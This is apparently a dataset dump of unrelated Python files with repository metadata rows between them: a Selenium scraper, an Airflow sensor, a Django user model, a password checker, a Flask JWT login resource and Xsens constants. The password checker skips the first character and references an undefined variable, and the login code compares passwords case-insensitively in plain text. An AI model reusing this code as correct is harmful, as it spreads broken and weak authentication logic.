        self.COURSE = course

        class_search_link = WebDriverWait(self.driver, 10).until(EC.presence_of_element_located(
            (By.XPATH, '//*[@id="portlet_u31l1n51"]/div/span[1]/div/a')))
        class_search_link.click()

        # self.driver.switch_to.frame(0)
        WebDriverWait(self.driver, 10).until(
            EC.frame_to_be_available_and_switch_to_it((By.TAG_NAME, 'iframe')))

        select = Select(self.driver.find_element_by_id('term_input_id'))
        select.select_by_visible_text(self.TERM)
        self.driver.find_element_by_xpath(
            '/html/body/div[3]/form/input').submit()

        select = Select(self.driver.find_element_by_id('subj_id'))
        select.select_by_value(self.SUBJECT)
        self.driver.find_element_by_xpath(
            '//*[@id="courseBtnDiv"]/input[2]').click()

        course_view_btn = self.driver.find_elements_by_xpath(
            "//input[../../../td=" + self.COURSE + "]")
        course_view_btn[-1].click()

        WebDriverWait(self.driver, 10).until(EC.presence_of_element_located(
            (By.XPATH, "//input[@value='Register']")))

        course_sections = self.driver.find_elements_by_class_name('datadisplaytable')[0]
        course_content = course_sections.get_attribute('innerHTML')
        # print(course_content)
        return course_content

    def compare_contents(self, current_content=None):
        previous_contents = ''
        changed = False

        with open(self.OUTPUT_FILE, 'r') as f:
            previous_contents = f.read()

        if previous_contents == current_content:
            changed = False
        else:
            changed = True
            with open(self.OUTPUT_FILE, 'w') as f:
                f.write(current_content)

        return changed, current_content, previous_contents

    def __del__(self):
        self.driver.quit()
| 31.971154 | 108 | 0.668571 | 410 | 3,325 | 5.14878 | 0.331707 | 0.080531 | 0.059687 | 0.069635 | 0.254382 | 0.210801 | 0.123164 | 0.094742 | 0.059687 | 0.059687 | 0 | 0.007719 | 0.220752 | 3,325 | 103 | 109 | 32.281553 | 0.807024 | 0.035188 | 0 | 0.060606 | 0 | 0 | 0.079975 | 0.04936 | 0 | 0 | 0 | 0 | 0 | 1 | 0.075758 | false | 0.060606 | 0.106061 | 0 | 0.227273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
046adc53c7fe3e03006b675d1e1ef4fb8a9ffa29 | 924 | py | Python | src/airflow_fs/sensors.py | Sergfalt/airflow-fs | b1e09035242b4feb70faf1626a12d6078d0883c1 | [
"MIT"
] | 16 | 2019-03-14T22:21:36.000Z | 2021-10-05T20:34:13.000Z | src/airflow_fs/sensors.py | Sergfalt/airflow-fs | b1e09035242b4feb70faf1626a12d6078d0883c1 | [
"MIT"
] | 1 | 2019-10-15T19:24:06.000Z | 2020-04-06T12:56:17.000Z | src/airflow_fs/sensors.py | Sergfalt/airflow-fs | b1e09035242b4feb70faf1626a12d6078d0883c1 | [
"MIT"
] | 8 | 2019-03-15T22:11:15.000Z | 2021-07-07T18:45:50.000Z | """Module containing file system sensors."""
from airflow.sensors.base_sensor_operator import BaseSensorOperator
from airflow.utils.decorators import apply_defaults
from airflow_fs.hooks import LocalHook
class FileSensor(BaseSensorOperator):
"""Sensor that waits for files matching a given file pattern.
:param str path: File path to match files to. Can be any valid
glob pattern.
:param FsHook hook: File system hook to use when looking for files.
"""
template_fields = ("file_pattern",)
@apply_defaults
def __init__(self, path, hook=None, **kwargs):
super(FileSensor, self).__init__(**kwargs)
self._path = path
self._hook = hook or LocalHook()
# pylint: disable=unused-argument,missing-docstring
def poke(self, context):
with self._hook as hook:
if hook.glob(self._path):
return True
return False
| 28.875 | 71 | 0.6829 | 116 | 924 | 5.275862 | 0.577586 | 0.053922 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.234848 | 924 | 31 | 72 | 29.806452 | 0.865629 | 0.322511 | 0 | 0 | 0 | 0 | 0.020067 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.133333 | false | 0 | 0.2 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
046be80319f651476fa1099fd611e380f14e2ece | 412 | py | Python | pkg/tests/test_range.py | arita37/pyvtreat | c32e7ce6db11a2ccdd63e545b25028cbec03a3ff | [
"BSD-3-Clause"
] | 1 | 2020-08-16T12:07:56.000Z | 2020-08-16T12:07:56.000Z | pkg/tests/test_range.py | arita37/pyvtreat | c32e7ce6db11a2ccdd63e545b25028cbec03a3ff | [
"BSD-3-Clause"
] | null | null | null | pkg/tests/test_range.py | arita37/pyvtreat | c32e7ce6db11a2ccdd63e545b25028cbec03a3ff | [
"BSD-3-Clause"
] | null | null | null | import vtreat.util
import pandas
import numpy
def test_range():
    # https://github.com/WinVector/pyvtreat/blob/master/Examples/Bugs/asarray_issue.md
    # https://github.com/WinVector/pyvtreat/issues/7
    numpy.random.seed(2019)
    arr = numpy.random.randint(2, size=10)
    sparr = pandas.arrays.SparseArray(arr, fill_value=0)
    assert vtreat.util.has_range(arr)
    assert vtreat.util.has_range(sparr)
| 29.428571 | 86 | 0.740291 | 60 | 412 | 5 | 0.633333 | 0.1 | 0.093333 | 0.153333 | 0.366667 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02521 | 0.133495 | 412 | 13 | 87 | 31.692308 | 0.815126 | 0.308252 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.222222 | 1 | 0.111111 | false | 0 | 0.333333 | 0 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
046d31d158fc4b7351831f3cd9d74c5e9eb6c08b | 2,592 | py | Python | nipype/interfaces/ants/tests/test_auto_KellyKapowski.py | sebastientourbier/nipype | 99c5904176481520c5bf42a501aae1a12184e672 | [
"Apache-2.0"
] | null | null | null | nipype/interfaces/ants/tests/test_auto_KellyKapowski.py | sebastientourbier/nipype | 99c5904176481520c5bf42a501aae1a12184e672 | [
"Apache-2.0"
] | null | null | null | nipype/interfaces/ants/tests/test_auto_KellyKapowski.py | sebastientourbier/nipype | 99c5904176481520c5bf42a501aae1a12184e672 | [
"Apache-2.0"
] | null | null | null | # AUTO-GENERATED by tools/checkspecs.py - DO NOT EDIT
from __future__ import unicode_literals
from ..segmentation import KellyKapowski
def test_KellyKapowski_inputs():
    input_map = dict(
        args=dict(argstr='%s'),
        convergence=dict(argstr='--convergence "%s"',
                         usedefault=True),
        cortical_thickness=dict(argstr='--output "%s"',
                                hash_files=False,
                                keep_extension=True,
                                name_source=['segmentation_image'],
                                name_template='%s_cortical_thickness'),
        dimension=dict(argstr='--image-dimensionality %d',
                       usedefault=True),
        environ=dict(nohash=True,
                     usedefault=True),
        gradient_step=dict(argstr='--gradient-step %f',
                           usedefault=True),
        gray_matter_label=dict(usedefault=True),
        gray_matter_prob_image=dict(argstr='--gray-matter-probability-image "%s"'),
        ignore_exception=dict(nohash=True,
                              usedefault=True),
        max_invert_displacement_field_iters=dict(argstr='--maximum-number-of-invert-displacement-field-iterations %d'),
        num_threads=dict(nohash=True,
                         usedefault=True),
        number_integration_points=dict(argstr='--number-of-integration-points %d'),
        segmentation_image=dict(argstr='--segmentation-image "%s"',
                                mandatory=True),
        smoothing_variance=dict(argstr='--smoothing-variance %f'),
        smoothing_velocity_field=dict(argstr='--smoothing-velocity-field-parameter %f'),
        terminal_output=dict(nohash=True),
        thickness_prior_estimate=dict(argstr='--thickness-prior-estimate %f',
                                      usedefault=True),
        thickness_prior_image=dict(argstr='--thickness-prior-image "%s"'),
        use_bspline_smoothing=dict(argstr='--use-bspline-smoothing 1'),
        warped_white_matter=dict(hash_files=False,
                                 keep_extension=True,
                                 name_source=['segmentation_image'],
                                 name_template='%s_warped_white_matter'),
        white_matter_label=dict(usedefault=True),
        white_matter_prob_image=dict(argstr='--white-matter-probability-image "%s"'),
    )
    inputs = KellyKapowski.input_spec()

    for key, metadata in list(input_map.items()):
        for metakey, value in list(metadata.items()):
            assert getattr(inputs.traits()[key], metakey) == value


def test_KellyKapowski_outputs():
    output_map = dict(
        cortical_thickness=dict(),
        warped_white_matter=dict(),
    )
    outputs = KellyKapowski.output_spec()

    for key, metadata in list(output_map.items()):
        for metakey, value in list(metadata.items()):
            assert getattr(outputs.traits()[key], metakey) == value
046e66b446fbf1ac3ae733e7523d1431aba5d800 | 1,206 | py | Python | sample_project/users/models.py | CorrDyn/django-bulk-user-upload | caa5e74f295ad5b89056f588b5782fa396e502af | [
"MIT"
] | 1 | 2022-01-27T14:38:37.000Z | 2022-01-27T14:38:37.000Z | sample_project/users/models.py | CorrDyn/django-bulk-user-upload | caa5e74f295ad5b89056f588b5782fa396e502af | [
"MIT"
] | null | null | null | sample_project/users/models.py | CorrDyn/django-bulk-user-upload | caa5e74f295ad5b89056f588b5782fa396e502af | [
"MIT"
] | null | null | null | from django.contrib.auth.base_user import AbstractBaseUser
from django.contrib.auth.models import PermissionsMixin
# https://wsvincent.com/django-custom-user-model-tutorial/
from django.db import models
from django.utils import timezone
from django.utils.translation import gettext_lazy as _
from users.managers import UserManager
class User(AbstractBaseUser, PermissionsMixin):
    name = models.CharField(_("full name"), max_length=255, unique=True)
    username = models.CharField(_("username"), max_length=255, unique=True)
    email = models.EmailField(_("email address"), unique=True)
    is_staff = models.BooleanField(
        _("staff status"),
        default=False,
        help_text=_("Designates whether the user can log into this admin site."),
    )
    is_active = models.BooleanField(
        _("active"),
        default=True,
        help_text=_(
            "Designates whether this user should be treated as active. "
            "Unselect this instead of deleting accounts."
        ),
    )
    date_joined = models.DateTimeField(_("date joined"), default=timezone.now)

    objects = UserManager()

    EMAIL_FIELD = "email"
    USERNAME_FIELD = "username"
    REQUIRED_FIELDS = ["name"]
| 32.594595 | 118 | 0.707297 | 140 | 1,206 | 5.942857 | 0.521429 | 0.060096 | 0.040865 | 0.050481 | 0.052885 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006141 | 0.189884 | 1,206 | 36 | 119 | 33.5 | 0.845445 | 0.046434 | 0 | 0 | 0 | 0 | 0.203833 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.222222 | 0 | 0.62963 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
0471aa4a650f08ab7b5c8c85b7f2d8e99b5c94f4 | 6,081 | py | Python | main.py | Grads2Career-Python/eliaseraphim_password_confirmation | 0f3e3a9b7ad614587f24837d05c88ad3101570a1 | [
"MIT"
] | null | null | null | main.py | Grads2Career-Python/eliaseraphim_password_confirmation | 0f3e3a9b7ad614587f24837d05c88ad3101570a1 | [
"MIT"
] | null | null | null | main.py | Grads2Career-Python/eliaseraphim_password_confirmation | 0f3e3a9b7ad614587f24837d05c88ad3101570a1 | [
"MIT"
] | 1 | 2021-06-14T14:22:19.000Z | 2021-06-14T14:22:19.000Z | # author: elia deppe
# date 6/4/21
#
# simple password confirmation program that confirms a password of size 8 to 48, with at least: one lower-case letter,
# one upper-case letter, one number, and one special character.
# constants
MIN_LENGTH, MAX_LENGTH = 8, 48 # min and max length of password
# dictionaries
LOWER_CASE, UPPER_CASE = 'abcdefghijklmnopqrstuvwxyz', 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
NUMBERS, SPECIAL_CHARS = '0123456789', '!@#$%^&()-_+=[{]}:;<,>.?/'
FULL_DICTIONARY = LOWER_CASE + UPPER_CASE + NUMBERS + SPECIAL_CHARS
# function
# get_password
#
# parameter(s)
# none
# return value(s)
# password | string | the password desired by the user
# password_confirmation | string | the password desired by the user, entered a second time for confirmation
#
# description: gets the password from the user, and confirms that is the desired password by retrieving it twice.
def get_password():
    password = input('>> password\n>> ')
    password_confirmation = input('>> confirm password\n>> ')

    return password, password_confirmation
# function
# check_char
#
# parameter(s)
# char | string | the current character being inspected
# flags | dictionary {string: bool} | the flags for the password's validity
# return value(s)
# none
#
# description: checks the current character to see if it is valid. if so, checks to see if it fulfills the requirement
# of being a lower-case letter, upper-case letter, number, or special character (unless already fulfilled). if so,
# then the respective flag is set to true.
#
# if the character is not within the dictionary, then the invalid character flag is set.
def check_char(char, flags):
    if char in FULL_DICTIONARY:
        if not flags.get('lower') and char in LOWER_CASE:
            flags.update({'lower': True})
        elif not flags.get('upper') and char in UPPER_CASE:
            flags.update({'upper': True})
        elif not flags.get('num') and char in NUMBERS:
            flags.update({'num': True})
        elif not flags.get('special') and char in SPECIAL_CHARS:
            flags.update({'special': True})
    else:
        flags.update({'invalid': True})
# function
# valid
#
# parameter(s)
# flags | dictionary {string: bool} | the flags for the password's validity
# return value(s)
# none
#
# description: returns whether or not the password is valid based on the current flags
def valid(flags):
    return (
        not flags.get('invalid') and flags.get('lower') and flags.get('upper')
        and flags.get('num') and flags.get('special')
    )
# --------------- Error Functions
# function
# general_error
#
# parameter(s)
# flags | dictionary {string: bool} | the flags for the password's validity
# return value(s)
# none
#
# description: informs the user of which error they encountered when entering their password based on the flags.
def general_error(flags):
    if flags.get('invalid'):
        print('>> invalid characters used')
        print('>> the characters ~`\\| may not be used within a password')
    if not flags.get('lower'):
        print('>> password requires at least one lower-case letter')
    if not flags.get('upper'):
        print('>> password requires at least one upper-case letter')
    if not flags.get('num'):
        print('>> password requires at least one number')
    if not flags.get('special'):
        print('>> password requires at least one special character')
        print(f'   valid special characters | {SPECIAL_CHARS}')
# function
# length_error
#
# parameter(s)
# password | string | the password entered by the user
# length | int | the length of the password
# return value(s)
# none
#
# description: outputs an error where the length of the password is too small, or too large
def length_error(password, length):
    print(f'>> incorrect length, password should be between {MIN_LENGTH} and {MAX_LENGTH} characters long')
    print(f'   password | {password} | {length} characters long')
# function
# password_mismatch_error
#
# parameter(s)
# password | string | the password entered by the user
# password_confirmation | string | the confirmation password entered by the user
# return value(s)
# none
#
# description: outputs an error where the password and the password confirmation do not match
def password_mismatch_error(password, password_confirmation):
    print('>> passwords do not match, please check your spelling')
    print(f'   password              | {password}')
    print(f'   password confirmation | {password_confirmation}')
# function
# main
#
# parameter(s)
# none
# return value(s)
# none
#
# description: the main function of the program, initiates retrieving a password from the user and then confirms if it
# is valid. the user is informed if the password is valid, or invalid and why it was invalid
def main():
i = 1
password, password_confirmations = get_password()
flags = {
'invalid': True,
'lower' : False,
'upper' : False,
'num' : False,
'special': False
}
# check that the passwords match
if password == password_confirmation:
length = len(password)
# check the length of the password
if MIN_LENGTH <= length <= MAX_LENGTH:
# loop through the password, and while there has been no invalid char
while i < length and not flags.get('invalid'):
check_char(password[i], flags)
i += 1
# if loop is finished and flags are proper, then the password is good
if valid(flags):
print('>> password is valid')
# otherwise a general error
else:
general_error(flags)
# error with length of password
else:
length_error(password, length)
# password and confirmation mismatch
else:
password_mismatch_error(password, password_confirmation)
if __name__ == '__main__':
main()
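For context, here is a minimal sketch of the `check_char` helper that the loop in `main()` relies on (its real definition lives earlier in this file). The flag names mirror the dict built in `main()`; the `INVALID_CHARS` and `SPECIAL_CHARS` values are assumptions inferred from the error messages, not the file's actual constants.

```python
# Hypothetical reconstruction of check_char; the character sets below are
# assumptions based on the error messages printed by general_error.
INVALID_CHARS = '~`\\|'
SPECIAL_CHARS = '!@#$%^&*'

def check_char(ch, flags):
    # Set the flag that this single character satisfies.
    if ch in INVALID_CHARS:
        flags['invalid'] = True
    elif ch.islower():
        flags['lower'] = True
    elif ch.isupper():
        flags['upper'] = True
    elif ch.isdigit():
        flags['num'] = True
    elif ch in SPECIAL_CHARS:
        flags['special'] = True
```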
| 31.837696 | 118 | 0.645617 | 769 | 6,081 | 5.039012 | 0.217165 | 0.048258 | 0.025548 | 0.024774 | 0.285161 | 0.231226 | 0.201806 | 0.172129 | 0.154065 | 0.154065 | 0 | 0.005538 | 0.257688 | 6,081 | 190 | 119 | 32.005263 | 0.852902 | 0.476073 | 0 | 0.112676 | 0 | 0 | 0.272845 | 0.031644 | 0 | 0 | 0 | 0 | 0 | 1 | 0.098592 | false | 0.309859 | 0 | 0.014085 | 0.126761 | 0.183099 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
0477b8704fc254929c1468f8e3c98a6ae150cd99 | 1,040 | py | Python | problems/A/LevelStatistics.py | deveshbajpai19/CodeForces | 707b374f03012ec68054841f791d48b33ae4ef1b | [
"MIT"
] | 55 | 2016-06-19T05:45:15.000Z | 2022-03-31T15:18:53.000Z | problems/A/LevelStatistics.py | farhadcu/CodeForces-2 | 707b374f03012ec68054841f791d48b33ae4ef1b | [
"MIT"
] | null | null | null | problems/A/LevelStatistics.py | farhadcu/CodeForces-2 | 707b374f03012ec68054841f791d48b33ae4ef1b | [
"MIT"
] | 25 | 2016-07-29T13:03:15.000Z | 2021-09-17T01:45:45.000Z | __author__ = 'Devesh Bajpai'
'''
https://codeforces.com/problemset/problem/1334/A
Solution: It's easy to deduce that, even for one player, it is impossible to clear more levels than the plays made. This
also holds when there are multiple players. Secondly, the number of plays or levels cleared cannot go down, as they are
non-decreasing sequences. Incorporating these two conditions, we can check each test case and evaluate its validity.
'''
def solve(all_p_c):
prev_p = prev_c = 0
for this_p_c in all_p_c:
delta_p = this_p_c[0] - prev_p
delta_c = this_p_c[1] - prev_c
if delta_p < 0 or delta_c < 0 or delta_p < delta_c:
return "NO"
prev_p = this_p_c[0]
prev_c = this_p_c[1]
return "YES"
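The docstring's reasoning can be checked with a tiny self-contained re-statement of the two conditions (the function and variable names below are mine, not the file's):

```python
# Each snapshot (plays, clears) must be non-decreasing in both components,
# and clears can never grow faster than plays between snapshots.
def snapshots_consistent(pairs):
    prev_p = prev_c = 0
    for p, c in pairs:
        if p < prev_p or c < prev_c or p - prev_p < c - prev_c:
            return False
        prev_p, prev_c = p, c
    return True

assert snapshots_consistent([(0, 0), (1, 0), (3, 2)])
assert not snapshots_consistent([(0, 0), (1, 1), (1, 2)])  # clears jump with no play
```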
if __name__ == "__main__":
t = int(input())
for _ in range(0, t):
n = int(input())
all_p_c = list()
for _n in range(0, n):
p_c = list(map(int, input().split(" ")))
all_p_c.append(p_c)
print(solve(all_p_c))
| 26.666667 | 120 | 0.6375 | 177 | 1,040 | 3.457627 | 0.502825 | 0.039216 | 0.04085 | 0.03268 | 0.065359 | 0.039216 | 0 | 0 | 0 | 0 | 0 | 0.01847 | 0.271154 | 1,040 | 38 | 121 | 27.368421 | 0.788918 | 0 | 0 | 0 | 0 | 0 | 0.042994 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.05 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
047ddea5eaf08f1b1d3d02d14ffa8e3bbd12dec7 | 3,543 | py | Python | core/rest/authentication.py | macdaliot/Osmedeus | cd8020416af81a745af7b06c8c5a1c5881911234 | [
"MIT"
] | 1 | 2020-02-20T15:10:07.000Z | 2020-02-20T15:10:07.000Z | core/rest/authentication.py | macdaliot/Osmedeus | cd8020416af81a745af7b06c8c5a1c5881911234 | [
"MIT"
] | null | null | null | core/rest/authentication.py | macdaliot/Osmedeus | cd8020416af81a745af7b06c8c5a1c5881911234 | [
"MIT"
] | null | null | null |
import os
import json
import glob
import datetime
from flask_restful import Api, Resource, reqparse
from flask_jwt_extended import (
JWTManager, jwt_required, create_access_token,
get_jwt_identity
)
from configparser import ConfigParser, ExtendedInterpolation
from .decorators import local_only
import utils
'''
Check authentication
'''
current_path = os.path.dirname(os.path.realpath(__file__))
class Authentication(Resource):
parser = reqparse.RequestParser()
parser.add_argument('username',
type=str,
required=True,
help="This field cannot be left blank!"
)
parser.add_argument('password',
type=str,
required=True,
help="This field cannot be left blank!"
)
# add another authen level when settings things from remote
def verify(self, options):
config_path = options.get('CONFIG_PATH')
if config_path:
# get cred from config file
config = ConfigParser(interpolation=ExtendedInterpolation())
config.read(config_path)
config_username = config['Server']['username']
config_password = config['Server']['password']
if config_username.lower() == options.get('USERNAME').lower() and config_password.lower() == options.get('PASSWORD').lower():
return True
return False
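A minimal, self-contained illustration of the `ConfigParser` pattern that `verify()` relies on; the `[Server]` section layout mirrors the code above, but the credential values here are made up.

```python
# Parse a Server section the way verify() does; read_string stands in for
# config.read(config_path) so the snippet needs no file on disk.
from configparser import ConfigParser, ExtendedInterpolation

config = ConfigParser(interpolation=ExtendedInterpolation())
config.read_string("[Server]\nusername = admin\npassword = s3cret\n")
assert config['Server']['username'] == 'admin'
assert config['Server']['password'] == 's3cret'
```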
# just look for right cred on any workspace
def get_options(self, username, password):
option_files = glob.glob(
current_path + '/storages/**/options.json', recursive=True)
# loop though all options avalible
for option in option_files:
json_option = utils.reading_json(option)
if username == json_option.get('USERNAME'):
if password == json_option.get('PASSWORD'):
return True
return False
# @local_only
def post(self, workspace=None):
# global options
data = Authentication.parser.parse_args()
username = data['username']
password = data['password']
# if no workspace specific
if not workspace:
if self.get_options(username, password):
# cause we don't have real db so it's really hard to manage JWT
# just change the secret if you want to revoke old token
expires = datetime.timedelta(days=365)
token = create_access_token(username, expires_delta=expires)
return {'access_token': token}
else:
return {'error': "Credentials Incorrect"}
elif workspace == 'None':
pass
current_path = os.path.dirname(os.path.realpath(__file__))
options_path = current_path + \
'/storages/{0}/options.json'.format(workspace)
if not utils.not_empty_file(options_path):
return {'error': "Workspace not found"}
options = utils.reading_json(options_path)
if username == options.get('USERNAME'):
if password == options.get('PASSWORD'):
# cause we don't have real db so it's really hard to manage JWT
# just change the secret if you want to revoke old token
expires = datetime.timedelta(days=365)
token = create_access_token(username, expires_delta=expires)
return {'access_token': token}
return {'error': "Credentials Incorrect"}
| 34.735294 | 137 | 0.593847 | 385 | 3,543 | 5.322078 | 0.345455 | 0.026842 | 0.02489 | 0.016593 | 0.285017 | 0.285017 | 0.285017 | 0.285017 | 0.285017 | 0.244021 | 0 | 0.0029 | 0.318657 | 3,543 | 101 | 138 | 35.079208 | 0.845899 | 0.125318 | 0 | 0.294118 | 0 | 0 | 0.11053 | 0.016678 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044118 | false | 0.132353 | 0.117647 | 0 | 0.323529 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
047fc0cf6a71b49d6c093c09917af516389bdb89 | 3,862 | py | Python | hanse_ros/xsens_driver/nodes/mtdef.py | iti-luebeck/HANSE2012 | fd2348823a6a51baf87cd493529f085fb22d65a7 | [
"BSD-3-Clause"
] | null | null | null | hanse_ros/xsens_driver/nodes/mtdef.py | iti-luebeck/HANSE2012 | fd2348823a6a51baf87cd493529f085fb22d65a7 | [
"BSD-3-Clause"
] | null | null | null | hanse_ros/xsens_driver/nodes/mtdef.py | iti-luebeck/HANSE2012 | fd2348823a6a51baf87cd493529f085fb22d65a7 | [
"BSD-3-Clause"
] | null | null | null | """Constant and messages definition for MT communication."""
class MID:
"""Values for the message id (MID)"""
## Error message, 1 data byte
Error = 0x42
ErrorCodes = {
0x03: "Invalid period",
0x04: "Invalid message",
0x1E: "Timer overflow",
0x20: "Invalid baudrate",
0x21: "Invalid parameter"
}
# State MID
## Switch to measurement state
GoToMeasurement = 0x10
## Switch to config state
GoToConfig = 0x30
## Reset device
Reset = 0x40
# Informational messages
## Request device id
ReqDID = 0x00
## DeviceID, 4 bytes: HH HL LH LL
DeviceID = 0x01
## Request product code in plain text
ReqProductCode = 0x1C
## Product code (max 20 bytes data)
ProductCode = 0x1d
## Request firmware revision
ReqFWRev = 0x12
## Firmware revision, 3 bytes: major minor rev
FirmwareRev = 0x13
## Request data length according to current configuration
ReqDataLength = 0x0a
## Data Length, 2 bytes
DataLength = 0x0b
## Request GPS status
ReqGPSStatus = 0xA6
## GPS status
GPSStatus = 0xA7
# Device specific messages
## Request baudrate
ReqBaudrate = 0x18
## Set next baudrate
SetBaudrate = 0x18
## Restore factory defaults
RestoreFactoryDef = 0x0E
# Configuration messages
## Request configuration
ReqConfiguration = 0x0C
## Configuration, 118 bytes
Configuration = 0x0D
## Set sampling period, 2 bytes
SetPeriod = 0x04
## Set skip factor
SetOutputSkipFactor = 0xD4
## Set output mode, 2 bytes
SetOutputMode = 0xD0
## Set output settings, 4 bytes
SetOutputSettings = 0xD2
# Data messages
## Data packet
MTData = 0x32
# XKF Filter messages
## Request the available XKF scenarios on the device
ReqAvailableScenarios = 0x62
## Request the ID of the currently used scenario
ReqCurrentScenario = 0x64
## Set the scenario to use, 2 bytes
SetCurrentScenario = 0x64
class Baudrates(object):
"""Baudrate information and conversion."""
## Baudrate mapping between ID and value
Baudrates = [
(0x00, 460800),
(0x01, 230400),
(0x02, 115200),
(0x03, 76800),
(0x04, 57600),
(0x05, 38400),
(0x06, 28800),
(0x07, 19200),
(0x08, 14400),
(0x09, 9600),
(0x80, 921600)]
@classmethod
def get_BRID(cls, baudrate):
"""Get baudrate id for a given baudrate."""
for brid, br in cls.Baudrates:
if baudrate==br:
return brid
raise MTException("unsupported baudrate.")
@classmethod
def get_BR(cls, baudrate_id):
"""Get baudrate for a given baudrate id."""
for brid, br in cls.Baudrates:
if baudrate_id==brid:
return br
raise MTException("unknown baudrate id.")
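A standalone sketch of the two-way ID/baudrate lookup the class implements; the table is a trimmed copy of the mapping above and the function name is mine.

```python
# Look up the baudrate ID for a given baudrate, as Baudrates.get_BRID does.
BAUDRATES = [(0x00, 460800), (0x02, 115200), (0x80, 921600)]

def get_brid(baudrate):
    for brid, br in BAUDRATES:
        if baudrate == br:
            return brid
    raise ValueError("unsupported baudrate")

assert get_brid(115200) == 0x02
```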
class OutputMode:
"""Values for the output mode."""
Temp = 0x0001
Calib = 0x0002
Orient = 0x0004
Auxiliary = 0x0008
Position = 0x0010
Velocity = 0x0020
Status = 0x0800
RAWGPS = 0x1000 # supposed to be incompatible with previous
RAW = 0x4000 # incompatible with all except RAWGPS
class OutputSettings:
"""Values for the output settings."""
Timestamp_None = 0x00000000
Timestamp_SampleCnt = 0x00000001
OrientMode_Quaternion = 0x00000000
OrientMode_Euler = 0x00000004
OrientMode_Matrix = 0x00000008
CalibMode_AccGyrMag = 0x00000000
CalibMode_GyrMag = 0x00000010
CalibMode_AccMag = 0x00000020
CalibMode_Mag = 0x00000030
CalibMode_AccGyr = 0x00000040
CalibMode_Gyr = 0x00000050
CalibMode_Acc = 0x00000060
CalibMode_Mask = 0x00000070
DataFormat_Float = 0x00000000
DataFormat_12_20 = 0x00000100 # not supported yet
DataFormat_16_32 = 0x00000200 # not supported yet
DataFormat_Double = 0x00000300 # not supported yet
AuxiliaryMode_NoAIN1 = 0x00000400
AuxiliaryMode_NoAIN2 = 0x00000800
PositionMode_LLA_WGS84 = 0x00000000
VelocityMode_MS_XYZ = 0x00000000
Coordinates_NED = 0x80000000
class MTException(Exception):
def __init__(self, message):
self.message = message
def __str__(self):
return "MT error: " + self.message
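A quick demonstration of how the `OutputMode` bit masks above are meant to be combined and tested; the three values are copied from the class.

```python
# OutputMode flags are single bits, so modes combine with | and test with &.
Temp, Calib, Orient = 0x0001, 0x0002, 0x0004

mode = Calib | Orient
assert mode & Orient        # orientation output enabled
assert not (mode & Temp)    # temperature output disabled
```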
| 24.75641 | 62 | 0.722683 | 453 | 3,862 | 6.077263 | 0.569536 | 0.018162 | 0.013077 | 0.01235 | 0.023974 | 0.023974 | 0.023974 | 0.023974 | 0 | 0 | 0 | 0.142489 | 0.196789 | 3,862 | 155 | 63 | 24.916129 | 0.745003 | 0.330399 | 0 | 0.040816 | 0 | 0 | 0.051127 | 0 | 0 | 0 | 0.179549 | 0 | 0 | 1 | 0.040816 | false | 0 | 0 | 0.010204 | 0.734694 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
048e21a34122d250073c40e802c888ac73a5c8e4 | 602 | py | Python | src/program/migrations/0079_eventinstance_uuid.py | lgandersen/bornhack-website | fbda2b4b53dc2cb266d1d7c13ba0aad59d9079df | [
"BSD-3-Clause"
